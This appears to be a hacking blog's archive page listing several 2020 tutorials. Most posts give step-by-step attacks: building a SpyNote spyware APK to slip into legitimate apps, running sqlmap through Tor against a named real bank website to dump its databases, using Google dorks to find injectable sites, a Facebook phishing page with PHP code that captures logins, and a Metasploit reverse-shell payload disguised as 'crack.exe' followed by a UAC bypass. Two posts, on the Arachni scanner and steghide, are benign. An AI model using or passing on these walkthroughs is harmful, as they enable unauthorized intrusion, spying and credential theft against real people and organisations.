Posts

Showing posts from May, 2020

Android Hacking

Hacking Android using SPYNOTE Prerequisites: Android Device, Windows 10, SpyNote, Java. STEP 1: Download and execute SpyNote (spynote.us has been taken down by the Department of Homeland Security). STEP 2: Provide the port number and Java path if asked, or leave everything as default. STEP 3: Navigate to the Tools menu and select Payload. Fill in the reverse IP and other app details. In this step you can configure the properties of the payload. If you plan to merge this payload with any legit application, then browse to that application here. STEP 4: Now click on Build; it will trigger apktool and the apk will be created. STEP 5: Now copy the apk file to the Android device using any medium, like file sharing websites (mega.nz). STEP 6: Install the apk on the Android device. You will get a session on the SPYNOTE interface. Right click on the session and explore multiple options. As you can see there are multiple options available now, in short the mobile device is in your co...

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler: Python 3.x Script: SQLMAP Proxy: TOR STEP 1: Download and install TOR https://www.torproject.org/download/ STEP 2: Install TOR and start the TOR services. After installing Tor, a new Tor folder will be created (on the Desktop in my case). Navigate to the following location and start tor.exe: Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target. Navigate to the SQLMAP folder in PowerShell. Execute the following command: python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find database names, table names and dump the tables. Just add the following options: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u "$URL" --dbs # Enumerate tables sqlmap --dbms=...

SQL injection (SQLMAP)

SQL Injection Using SQLMAP Requirements: SQLMAP Script (Download), Python Compiler STEP 1: Identifying the target: Use a Google dork to find the target; search for the following: inurl:.php?id= site:.pk STEP 2: Check for the vulnerability in the URL by passing ' (single quote). If it returns ERROR then it's hackable. STEP 3: Open up PowerShell and navigate to the folder where sqlmap is kept. Type: python .\sqlmap.py -h to see the help. STEP 4: Finding out the names of the databases available. Type the following command in PowerShell: python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 5: Finding out the tables in it. Type the following command: python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" -D fcibankc_fci_urdu --tables Retrieved Table names STEP 6: Dumping the DATA inside Table...

Facebook Phishing

Capturing username and password using phishing page Legal disclaimer: Usage of phishing for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. STEP 1: Install Xampp and start the Apache Service. STEP 2: Open facebook.com and copy the source (ctrl + U) into a notepad file. Search for "action=" in the code and replace the URL following it with "capture.php" (only the first 2 occurrences need to be changed). Save it as index.html STEP 3: Create a new text file and write the following code in it: <?php // Redirect header("Location:https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110"); // Get IP address $ip = isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : isset($_SERVER['HTTP_X_F...

Scan Websites for Vulnerabilities with Arachni

ARACHNI Arachni is a tool that allows you to assess the security of web applications. In less simple terms, Arachni is a high-performance, modular, Open Source Web Application Security Scanner Framework. It is a system which started out as an educational exercise and as a way to perform specific security tests against a web application in order to identify, classify and log issues of security interest. It has now evolved into an infrastructure which can reliably perform any sort of WebApp related security audit and general data scraping. Requirement: Windows 10 and PowerShell STEP 1: Download Download link: https://www.arachni-scanner.com/download/ STEP 2: Extract Extract and navigate to the bin folder inside the Arachni folder STEP 3: Fire up the web interface by executing the following command: .\arachni_web.bat It will start the local server; copy the link and open it in any browser: http://localhost:9292/ STEP 3: Start a scan Set the target url and start the scan STEP 4: Reportin...

Windows 10 UAC Bypass

Advanced Windows Exploitation In the previous post we saw how to get a meterpreter session; now we will use the same session to exploit further and gain SYSTEM level privileges. Taking into consideration that we have a meterpreter session, we will move on to the next step. STEP 1: We will background the session that we had. To do this type the following command: background (to get out of meterpreter) Then type: back (to get out of the currently used exploit) Then type: search UAC (to get all the UAC bypass exploits) STEP 2: Select the most appropriate exploit, one that also runs on the latest Windows 10 update. Here we will select Windows Escalate UAC Protection Bypass (via SilentCleanup). To use this type the following commands: use exploit/windows/local/bypassuac_silentcleanup set lhost <your IP> set lport 8080 set session <session ID> *To see stored session IDs type sessions -l set payload windows/x64/meterpreter/reverse_tcp run STEP 3: We have successfully bypassed the UAC and have...

Steganography using STEGHIDE

Guide to Steghide Tool In this article, we’ll learn about Steghide. There are various steganography tools available, but the part that differentiates it is that it uses a variety of algorithms to encrypt the data. Moreover, Steghide supports hiding data behind any image (jpg/jpeg/png/gif/bmp), audio (mp3/wav), excel, etc. Introduction to Steganography In digital steganography, electronic communications may incorporate steganographic coding inside of a transport layer, such as a document file, picture file, program or protocol. The sender can begin with a harmless picture and make a few alterations to it in order to hide data, so that the alteration goes unnoticed by someone who is not specifically looking for it. Features Compression of embedded data BMP, GIF and JPG supported Encryption of embedded data Decryption via password Uses various algorithms for encryption STEP 1: Open your terminal and type the following command to download Steghide: apt-get install steghide For hel...

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: Open terminal in Kali and type the following commands: msfdb init msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp ...